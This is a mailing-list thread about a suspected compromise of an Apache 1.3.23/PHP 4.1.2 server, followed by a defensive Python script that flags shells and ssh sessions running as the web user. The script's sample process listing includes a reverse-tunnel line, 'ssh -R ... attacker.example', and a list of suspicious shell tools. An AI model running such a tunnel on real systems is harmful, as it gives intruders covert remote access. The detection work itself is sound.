
Re: possible apache flaw ?



> > in php scripts as even the most insecure script would not make apache
> > segfault and "give" someone a shell.
>
> I doubt segfaulting... but I see no reason why bad PHP programming
> wouldn't happily give me a shell :).

yeah I meant give you a shell as a result of apache segfaulting.

> > I didn't get the chance to portscan the server and see if it really
> > binds a shell to some port because of pf having very restrictive rules,
> > but that would explain the idling (user 'www' logged in for 10 minutes
> > idling before I kill the process).
>
> Check if there are remote ssh sessions.  If I had a way to get Apache
> (or PHP or whatever) to barf while tucked behind a "restrictive"
> firewall I'd have it spawn an 'ssh -R ...' and have it connect to me :).

There are no remote ssh sessions; the shell seems to keep idling. I don't
think that the guy (if it really is someone, which I am really starting to
believe) has the skills to rewrite a shellcode. Looking at the logs it seems
like it is a script kiddie using someone else's exploit (what cracker would
be dumb enough to trigger over a hundred attacks in a few days without
fearing to get discovered). What I think is that this guy saw that there was
something going wrong but, ssh not being accessible, he would not be able to
get in.

> The segfault bit is disturbing though.  Either you're *really* screwed
> something up :) or someone's got an interesting exploit.

Well, I don't know what I would have screwed up, really. I believe there
is some exploit but there are just rumors, I don't know what is true and
what is false, but all this makes me wonder.

> So to be clear, this is NOT the default Apache from OpenBSD but the
> latest flavor from apache.org?  Same with PHP?

It is apache 1.3.23 and php 4.1.2.

> > is constantly auditing logs in search of weird things.
>
> Hmmm, and a packet sniffer on another box would be fun :).

Yeah, I configured pf on the gateway to log every packet, incoming and
outgoing. I should be able to retrace which client caused apache to segfault,
as apache doesn't log the IP address of the client in this particular case.

> Can you tell, from your logs, say login times for the www users and the
> last pages accessed?

Nope, that's why I enabled full logging.

> Marc


veins
-- bofh at kheos.net && skreel.org - bofh, the choice of a degenerate
administration.
'One day, a duck named Harry said to a female duck: laugh, duck! And the
duck laughed.' ('Un jour, un canard qui se prénommait Harry dit à une cane:
ris, cane ! Et la cane a ri.')
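The check Marc suggests above (look for a stray shell, or an outbound `ssh -R` session, running under the unprivileged user httpd drops to) is easy to script. The following is an added example and not code from the original thread: it parses a `ps -axo user,pid,ppid,tty,command` listing (the sample below is constructed, not taken from the poster's box) and flags any `www`-owned process that is an interactive shell or ssh client, has a controlling tty, or is a non-httpd child of an httpd worker. The user name `www`, the process name `httpd`, and the list of suspicious commands are assumptions you would adjust for your own host.

```python
"""Flag shells, ssh clients and tty-attached processes running as the web user.

Added example for the thread above, not code from the original post.
Assumes BSD-style `ps -axo user,pid,ppid,tty,command` output, that httpd
runs its workers as 'www', and that a ps TT column of '??' means no tty.
"""
import subprocess

# Commands that should never run under the httpd worker account (assumption).
SUSPICIOUS_CMDS = {"sh", "ksh", "csh", "bash", "ssh", "scp", "nc", "telnet"}

# Constructed sample listing; pids 1302 and 1305 are the planted rogue entries.
SAMPLE_PS = """\
USER   PID  PPID TT  COMMAND
root     1     0 ??  /sbin/init
root  1234     1 ??  /usr/sbin/httpd
www   1240  1234 ??  /usr/sbin/httpd
www   1241  1234 ??  /usr/sbin/httpd
www   1302  1241 ??  /bin/sh -i
www   1305  1302 p0  ssh -R 2222:127.0.0.1:22 attacker.example
marc  2001  1999 p1  -ksh
"""


def parse_ps(text):
    """Turn the 5-column ps listing into a list of dicts (header dropped)."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 4)  # COMMAND may itself contain spaces
        if len(parts) < 5:
            continue
        user, pid, ppid, tty, cmd = parts
        rows.append({"user": user, "pid": int(pid), "ppid": int(ppid),
                     "tty": tty, "command": cmd})
    return rows


def basename(cmd):
    """Program name of a command line; login shells appear as e.g. '-ksh'."""
    first = cmd.split()[0].lstrip("-")
    return first.rsplit("/", 1)[-1]


def find_rogue_processes(rows, web_user="www", httpd_name="httpd"):
    """Return [(pid, command, [reasons])] for web_user processes that look wrong."""
    by_pid = {r["pid"]: r for r in rows}
    findings = []
    for r in rows:
        if r["user"] != web_user:
            continue
        name = basename(r["command"])
        reasons = []
        if name in SUSPICIOUS_CMDS:
            reasons.append(f"{name} running as {web_user}")
        if r["tty"] != "??":
            reasons.append(f"has controlling tty {r['tty']}")
        parent = by_pid.get(r["ppid"])
        # An httpd worker forks CGI/PHP helpers, but never a long-lived shell.
        if parent and basename(parent["command"]) == httpd_name and name != httpd_name:
            reasons.append(f"child of httpd pid {parent['pid']}")
        if reasons:
            findings.append((r["pid"], r["command"], reasons))
    return findings


def live_ps():
    """Read the real process table on a BSD host (keywords exist on OpenBSD ps)."""
    return subprocess.run(["ps", "-axo", "user,pid,ppid,tty,command"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for pid, cmd, reasons in find_rogue_processes(parse_ps(SAMPLE_PS)):
        print(f"pid {pid}: {cmd}\n    " + "; ".join(reasons))
```

Run it from cron or a watchdog with `parse_ps(live_ps())` instead of the sample; on the listing above it reports the `/bin/sh -i` child of an httpd worker and the `www`-owned `ssh -R` sitting on a tty, while the legitimate httpd workers and the administrator's own login shell stay quiet. Pair it with `who`/`last` and the pf logs so that a flagged pid can be matched to the client that triggered it.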